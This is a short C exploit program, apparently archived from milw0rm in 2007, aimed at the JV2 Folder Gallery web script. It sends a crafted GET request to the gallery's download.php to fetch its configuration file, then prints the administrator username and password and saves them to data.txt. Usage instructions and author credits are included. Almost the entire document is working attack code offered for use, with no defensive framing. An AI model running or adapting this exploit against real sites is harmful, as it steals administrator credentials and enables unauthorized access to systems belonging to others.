/* Script Name :JV2 Folder Gallery Script site :www.jv2.net Discovered by :SaO Exploit Coded by :PeTrO Credits To soulreaver,Kuz3y Compile: Visual C++ or DevC++ */ #include #include #include #pragma comment(lib,"ws2_32.lib") int main(int argc, char *argv[]) { char gelenveri[1000]; char sendCommand[1000]; int i=0,sayac=0; WSADATA wsdata; SOCKET s; struct hostent *hn; struct sockaddr_in karsi_addr; WSAStartup(MAKEWORD(2,0),&wsdata); if(argc!=3) { printf("\t**************************************************************\n" "\t* *\n" "\t* JV2 Folder Gallery *\n" "\t* Remote Admin uName and Pass. Exploit by PeTrO *\n" "\t* *\n" "\t* Usage:exploit targetSite [GalleryPath] *\n" "\t* Example:exploit localhost /gallery/ *\n" "\t* *\n" "\t* Discovered by :SaO *\n" "\t* Exploit Coded by :PeTrO *\n" "\t**************************************************************\n"); exit(1); }else{ hn=gethostbyname(argv[1]); } strcpy(sendCommand,"GET "); strcat(sendCommand,argv[2]); strcat(sendCommand,"download.php?file=config/gallerysetup.php \n\n"); printf("\n[+]Connecting...."); karsi_addr.sin_family = AF_INET; karsi_addr.sin_port = htons(80); karsi_addr.sin_addr =*((struct in_addr *)hn->h_addr); memset(&(karsi_addr.sin_zero),'\0', 8); if((s=socket(AF_INET, SOCK_STREAM, 0))==-1 ) //create a socket { printf("\n[-]Socket Error"); exit(-1); } if((connect(s,(struct sockaddr *)&karsi_addr,sizeof(struct sockaddr)))==-1)//connect server { printf("\n[-]Connecting Error"); exit(-1); } printf("\n[+]Sending command\n"); if((send(s,sendCommand,strlen(sendCommand),0))==-1) { printf("\n[-]Sending Error"); exit(-1); } if((recv(s,gelenveri,1000,0))==-1) { printf("\n[-]Receive Error"); exit(-1); } FILE *fp; fp=fopen("data.txt","w"); for(i=0;sayac!=2;i++) { if(gelenveri[i]==59) sayac++; printf("%c",gelenveri[i]); } fprintf(fp,"%s",gelenveri); WSACleanup(); return 0; } // milw0rm.com [2007-01-14]